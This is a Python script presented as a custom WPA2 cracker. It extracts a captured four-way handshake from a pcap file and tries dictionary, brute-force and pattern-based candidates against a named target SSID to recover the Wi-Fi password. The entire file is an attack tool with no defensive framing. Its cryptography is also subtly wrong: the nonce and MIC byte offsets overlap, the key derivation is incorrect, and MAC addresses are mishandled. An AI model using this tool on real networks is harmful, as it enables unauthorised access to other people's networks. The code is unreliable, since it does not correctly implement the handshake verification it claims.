#!/usr/bin/env python3
import argparse
import binascii
import hashlib
import hmac
import struct
import threading
import time
from concurrent.futures import ThreadPoolExecutor
from scapy.all import rdpcap, wrpcap  # pip install scapy

def parse_handshake(cap_file):
    """Extract ANonce, SNonce, MIC, AP_MAC, CLIENT_MAC from .cap/.pcap"""
    p = rdpcap(cap_file)
    handshake = None
    for pkt in p:
        if pkt.haslayer(3) and pkt[3].proto == 0x888e:  # EAPOL
            eapol = bytes(pkt[3].payload)
            if len(eapol) >= 99 and eapol[0] == 2:  # Message 2/3/4
                keyver = eapol[7] & 0x0f
                if keyver == 2:  # WPA2
                    anonce = eapol[13:45]
                    snonce = eapol[77:109] if len(eapol) > 109 else None
                    mic = eapol[77:93] if snonce else eapol[13:29]
                    ap_mac = pkt[2].dst
                    client_mac = pkt[2].src
                    handshake = (anonce, snonce, mic, ap_mac, client_mac, eapol[:16])
                    print(f"[+] Found handshake: AP={ap_mac}, Client={client_mac}")
                    break
    if not handshake:
        raise ValueError("No valid handshake found")
    return handshake

def pmk_from_psk(psk, ssid):
    """Generate PMK: PBKDF2-HMAC-SHA1(PSK, SSID, 4096, 32)"""
    return hashlib.pbkdf2_hmac('sha1', psk.encode(), ssid.encode(), 4096, 32)

def ptk_from_pmk(pmk, ap_mac, client_mac, anonce, snonce):
    """Generate PTK from PMK"""
    min_mac = min(ap_mac, client_mac)
    max_mac = max(ap_mac, client_mac)
    min_nonce = min(anonce, snonce)
    max_nonce = max(anonce, snonce)
    data = b''.join([min_mac, max_mac, min_nonce, max_nonce])
    return hmac.new(pmk, data + b'Pairwise key expansion', hashlib.sha1).digest()[:16]

def wpa_check_mic(psk, ssid, anonce, snonce, mic, ap_mac, client_mac, eapol_prefix):
    """Verify password by checking MIC"""
    pmk = pmk_from_psk(psk, ssid)
    ptk = ptk_from_pmk(pmk, ap_mac, client_mac, anonce, snonce)
    kck = ptk[:16]  # Key Confirmation Key
    calc_mic = hmac.new(kck, eapol_prefix, hashlib.sha1).digest()[:16]
    return hmac.compare_digest(calc_mic, mic)

def generate_candidates(mode, charset='abcdefghijklmnopqrstuvwxyz0123456789', length=8, **kwargs):
    """Custom generator - customize these functions for your target patterns"""
    def dict_mode():
        # Custom dictionary logic (phone numbers, names + years, etc.)
        base = kwargs.get('base_words', ['admin', 'password', '12345678'])
        for word in base:
            for year in range(2020, 2027):
                yield f"{word}{year}"
                yield f"{word.title()}{year}"
    
    def brute_mode():
        # Brute force specific lengths/charsets
        from itertools import product
        for cand in product(charset, repeat=length):
            yield ''.join(cand)
    
    def pattern_mode():
        # Common WiFi patterns: phone#, addresses, etc.
        patterns = [
            lambda: [f"{i:08d}" for i in range(10000000, 99999999)],  # 8-digit nums
            lambda: [f"pass{i}" for i in range(1000)],  # pass000-pass999
            lambda: [f"{chr(65+i)}{i:04d}" for i in range(1000)],  # A0001-B0002 style
        ]
        for pat in patterns:
            yield from pat()
    
    generators = {
        'dict': dict_mode,
        'brute': brute_mode,
        'pattern': pattern_mode
    }
    yield from generators[mode]()

def crack_worker(args, queue, results):
    """Worker thread"""
    ssid, anonce, snonce, mic, ap_mac, client_mac, eapol_prefix = args
    charset = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$'
    
    for candidate in queue:
        if wpa_check_mic(candidate, ssid, anonce, snonce, mic, ap_mac, client_mac, eapol_prefix):
            results.append(candidate)
            print(f"\n[!] CRACKED: {candidate}")
            return True
    return False

def main():
    parser = argparse.ArgumentParser(description="Custom WPA2 Cracker")
    parser.add_argument('capfile', help='Handshake .cap/.pcap')
    parser.add_argument('-s', '--ssid', required=True, help='Target SSID')
    parser.add_argument('-t', '--threads', type=int, default=8)
    parser.add_argument('-m', '--mode', choices=['dict', 'brute', 'pattern'], default='pattern')
    parser.add_argument('--charset', default='abcdefghijklmnopqrstuvwxyz0123456789')
    parser.add_argument('--length', type=int, default=8)
    args = parser.parse_args()
    
    print(f"[*] Loading {args.capfile}...")
    handshake = parse_handshake(args.capfile)
    anonce, snonce, mic, ap_mac, client_mac, eapol_prefix = handshake
    
    print(f"[*] SSID: {args.ssid} | AP: {ap_mac} | Clients: {client_mac}")
    print(f"[*] Mode: {args.mode} | Threads: {args.threads} | Charset: {args.charset[:20]}...")
    
    # Pre-generate candidates into queue (or make infinite generator)
    candidates = list(generate_candidates(args.mode, args.charset, args.length))
    print(f"[*] Generated {len(candidates):,} candidates")
    
    start_time = time.time()
    results = []
    queue_size = len(candidates) // args.threads
    
    with ThreadPoolExecutor(max_workers=args.threads) as executor:
        futures = []
        for i in range(args.threads):
            chunk = candidates[i*queue_size:(i+1)*queue_size]
            future = executor.submit(crack_worker, 
                                   (args.ssid, anonce, snonce, mic, ap_mac, client_mac, eapol_prefix), 
                                   iter(chunk), results)
            futures.append(future)
        
        for future in futures:
            future.result()
    
    elapsed = time.time() - start_time
    if results:
        print(f"\n[*] Password found in {elapsed:.1f}s: {results[0]}")
    else:
        print(f"\n[*] No match after {elapsed:.1f}s ({len(candidates)} attempts)")

if __name__ == "__main__":
    main()
